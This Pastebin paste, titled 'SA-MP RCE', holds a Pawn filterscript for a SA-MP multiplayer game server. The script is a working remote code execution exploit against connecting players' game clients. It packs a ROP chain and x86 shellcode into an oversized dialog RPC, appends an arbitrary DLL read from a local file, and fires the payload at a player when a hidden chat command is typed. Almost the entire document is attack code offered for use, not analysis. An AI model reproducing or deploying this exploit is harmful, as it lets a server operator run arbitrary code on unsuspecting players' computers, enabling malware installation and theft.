API tools faq
paste
Advertisement
evgen1137

SA-MP RCE

evgen1137
Feb 24th, 2024
1,073
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pawn 4.21 KB | Source Code | 0 0
raw download clone embed print report
  1. // © blast.hk
  2. #define FILTERSCRIPT
  3. #include <a_samp>
  4. #include <Pawn.RakNet>
  5.  
  6. new const RPC_ShowDialog = 61;
  7. new const RPC_ScrSetGravity = 146;
  8.  
  9. new payload1[] =
  10. {
  11. //          +0    +1    +2    +3    +4    +5    +6    +7    +8    +9   +10   +11   +12   +13   +14   +15
  12. /* 000 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  13. /* 016 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  14. /* 032 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  15. /* 048 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  16. /* 064 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  17. /* 080 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  18. /* 096 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  19. /* 112 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  20. /* 128 */ 0x20, 0x20, 0x20, 0x20, 0x84, 0x39, 0x86, 0x00
  21. };
  22.  
  23. new payload2[] =
  24. {
  25.     0x15, 0x27, 0x40, 0x00, // pop ecx gadget
  26.     0x37, 0x00, 0x00, 0x00, // ecx value
  27.     0x8D, 0x2E, 0x40, 0x00, // pop edi gadget
  28.     0x00, 0x60, 0x86, 0x00, // edi value
  29.     0xE6, 0x2E, 0x5B, 0x00, // rep movsd gadget
  30.     0x00, 0x00, 0x00, 0x00, // edi value
  31.     0x00, 0x00, 0x00, 0x00, // esi value
  32.     0x00, 0x60, 0x86, 0x00, // ret to dst
  33.     0x00, 0x00, 0x00, 0x00, // pad
  34.    
  35.     0x8D, 0xA5, 0xD8, 0xFE, 0xFF, 0xFF, 0x8B, 0x45, 0x3C, 0x2D, 0x18, 0x01, 0x00, 0x00, 0x8B, 0x08, 0x8B,
  36.     0x50, 0x08, 0x8B, 0x70, 0x0C, 0x83, 0xC1, 0x07, 0xC1, 0xE9, 0x03, 0x83, 0xC2, 0x07, 0xC1, 0xEA, 0x03,
  37.     0x29, 0xD1, 0x01, 0xD6, 0x51, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0x51, 0x6A, 0x00, 0xA1, 0xA4,
  38.     0x81, 0x85, 0x00, 0xFF, 0xD0, 0x89, 0xC7, 0x59, 0xF3, 0xA4, 0xFF, 0xD0, 0x5F, 0x5E, 0xB8, 0x01, 0x00,
  39.     0x00, 0x00, 0x5B, 0x89, 0xEC, 0x5D, 0xC2, 0x08, 0x00
  40. };
  41.  
  42.  
  43. new BitStream:payload_bs;
  44.  
  45. new payload_array[21111];
  46.  
  47. public OnFilterScriptInit()
  48. {
  49.     payload_bs = BS_New();
  50.     BS_WriteUint16(payload_bs, 1); // dialog id
  51.     BS_WriteUint8(payload_bs, DIALOG_STYLE_LIST); // style
  52.     BS_WriteUint8(payload_bs, sizeof(payload2)); // caption length
  53.     for(new i = 0; i < sizeof(payload2); i++) // caption
  54.     {
  55.         BS_WriteUint8(payload_bs, payload2[i]);
  56.     }
  57.     BS_WriteString8(payload_bs, ""); // left button
  58.     BS_WriteString8(payload_bs, ""); // right button
  59.     BS_WriteCompressedString(payload_bs, payload1); // text
  60.  
  61.     // align
  62.     new offset;
  63.     BS_GetWriteOffset(payload_bs, offset);
  64.     BS_SetWriteOffset(payload_bs, PR_BYTES_TO_BITS(PR_BITS_TO_BYTES(offset)));
  65.  
  66.     // dll
  67.     new File:fi = fopen("test.asi");
  68.     new payload_len = flength(fi);
  69.     if(payload_len > sizeof(payload_array) * 4)
  70.     {
  71.         printf("ERROR! Not enough space to read! %d needed", payload_len / 4);
  72.     }
  73.     else
  74.     {
  75.         fblockread(fi, payload_array);
  76.         printf("SUCC READ PAYLOAD of %d bytes", payload_len);
  77.         for(new i = 0; i < payload_len / 4; i++)
  78.         {
  79.             BS_WriteUint32(payload_bs, payload_array[i]);
  80.         }
  81.     }
  82.     fclose(fi);
  83. }
  84.  
  85. public OnFilterScriptExit()
  86. {
  87.     BS_Delete(payload_bs);
  88. }
  89.  
  90. public OnPlayerCommandText(playerid, cmdtext[])
  91. {
  92.     if(!strcmp("/aasd1", cmdtext, true))
  93.     {
  94.         PerformRCE(playerid);
  95.         return 1;
  96.     }
  97.     return 0;
  98. }
  99.  
  100. PerformRCE(playerid)
  101. {
  102.     SetPlayerGravity(playerid, Float:0x3C658B90);
  103.     PR_SendRPC(payload_bs, playerid, RPC_ShowDialog, PR_LOW_PRIORITY, PR_RELIABLE_ORDERED, 4);
  104.     HidePlayerDialog(playerid);
  105.     SetPlayerGravity(playerid, 0.008);
  106. }
  107.  
  108. SetPlayerGravity(playerid, Float:gravity)
  109. {
  110.     new BitStream:bs = BS_New();
  111.     BS_WriteFloat(bs, gravity);
  112.     PR_SendRPC(bs, playerid, RPC_ScrSetGravity, PR_LOW_PRIORITY, PR_RELIABLE_ORDERED, 4);
  113.     BS_Delete(bs);
  114. }
  115.  
  116. HidePlayerDialog(playerid)
  117. {
  118.     new BitStream:bs = BS_New();
  119.     BS_WriteUint16(bs, -1); // id
  120.     BS_WriteUint8(bs, DIALOG_STYLE_MSGBOX); // style
  121.     BS_WriteString8(bs, " "); // caption
  122.     BS_WriteString8(bs, ""); // left button
  123.     BS_WriteString8(bs, ""); // right button
  124.     BS_WriteCompressedString(bs, " "); // text
  125.     PR_SendRPC(bs, playerid, RPC_ShowDialog, PR_LOW_PRIORITY, PR_RELIABLE_ORDERED, 4);
  126.     BS_Delete(bs);
  127. }
  128.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!